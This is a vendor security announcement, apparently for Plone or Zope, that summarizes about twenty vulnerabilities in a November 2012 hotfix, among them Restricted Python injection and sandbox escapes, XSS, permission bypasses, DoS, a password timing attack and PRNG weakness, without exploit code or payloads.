Security vulnerability announcement: 20121106 - Multiple vectors

Restricted Python injection

Anonymous users can cause an arbitrary Python statement to be run when the admin interface is accessed. No breakout of the in-built Python sandbox is possible, but it will run with the privileges of that admin user.

Restricted Python injection - Read More…

Reflexive HTTP header injection

A crafted URL can contain arbitrary HTTP headers that are then returned to the user. Can be used to log users out, for example.

Reflexive HTTP header injection - Read More…

Restricted Python sandbox escape

Accidental exposure of the sandbox whitelisting function when imported from a certain, nonstandard location.

Restricted Python sandbox escape - Read More…

Restricted Python injection

Crafted URL allows arbitrary (sandboxed) Python to be run.

Restricted Python injection - Read More…

Partial restricted Python sandbox escape

Incomplete security declarations on certain objects allow permission checking to be bypassed on some functions.

Partial restricted Python sandbox escape - Read More…

Reflexive XSS

Crafted URL allows a passed full response body (or a redirect target) to be returned by accidental exposure of internal methods of the response file handle on a URL.

Reflexive XSS - Read More…

Partial permissions bypass

Can be used to access a subset of attributes of unpublished content items through a crafted URL, if that content's path is known

Partial permissions bypass - Read More…

Restricted Python sandbox escape

Escape from sandbox through a utility function not checking that it has valid inputs, allowing access to the trusted builtins

Restricted Python sandbox escape - Read More…

Reflexive XSS

Utility function is callable directly through a crafted URL and accepts a default value.

Reflexive XSS - Read More…

Restricted Python injection

Crafted URL allows arbitrary (sandboxed) Python to be run

Restricted Python injection - Read More…

Anonymous users can list user account names

A method of the membership database is insufficiently protected, allowing users who do not have permission to enumerate users to do so through a crafted URL

Anonymous users can list user account names - Read More…

Partial denial of service through Collections functionality

This DoS causes large amounts of IO and cache churn, meaning it can be used to DoS a site if accessed repeatedly

Partial denial of service through Collections functionality - Read More…

Anonymous users can batch change titles of content items

The batch id change script does not correctly handle anonymous users attempting to change titles but leaving the ids the same correctly. Allows anonymous users to craft a POST request (once they've found a valid CSRF token) to change content titles arbitrarily.

Anonymous users can batch change titles of content items - Read More…

Crafted URL allows downloading of BLOBs that are not visible to the user

BLOBs stored on custom content types can be accessed through a non-standard URL, bypassing the declared permission check

Crafted URL allows downloading of BLOBs that are not visible to the user - Read More…

Persistent XSS via filtering bypass

HTML content crafted by users may allow execution of arbitrary javascript on specific browsers.

Persistent XSS via filtering bypass - Read More…

Users connected through FTP can list hidden folder contents

Users can read the contents of folders (but not access the files themselves) that they would otherwise be unable to access.

Users connected through FTP can list hidden folder contents - Read More…

Persistent XSS

Crafted URLs allow arbitrary strings (including full HTML) to be stored in memory against a key, that can then be read out again on a related URL.

Persistent XSS - Read More…

Attempting to access a view with no name returns an internal data structure

Some types of URL can be ambiguous, the unambiguous form allows anonymous views. On some content types an anonymous view lookup returns a private data structure, which under certain circumstances may be used to read out confidential data.

Attempting to access a view with no name returns an internal data structure - Read More…

DoS through RSS on private folder

A specially crafted URL invoking the RSS feed for a folder the user doesn't have access to (but knows the path of) can cause an infinite loop, trying up a server thread.

DoS through RSS on private folder - Read More…

Timing attack in password validation

The equality test in our authentication system is not constant time, allowing a user with a sufficiently stable, fast connection to the server to check hash prefixes

Timing attack in password validation - Read More…

PRNG isn't reseeded

We are using a Python random (seeded via system random), not system random, which in a long running process means it isn't reseeded. In addition, our error pages leak random numbers, allowing the state of the PRNG used for password resets to be derived.

PRNG isn't reseeded - Read More…

Form detail exposure

A vulnerability in z3c.form that leaks default values of form fields through crafted URLs.

Form detail exposure - Read More…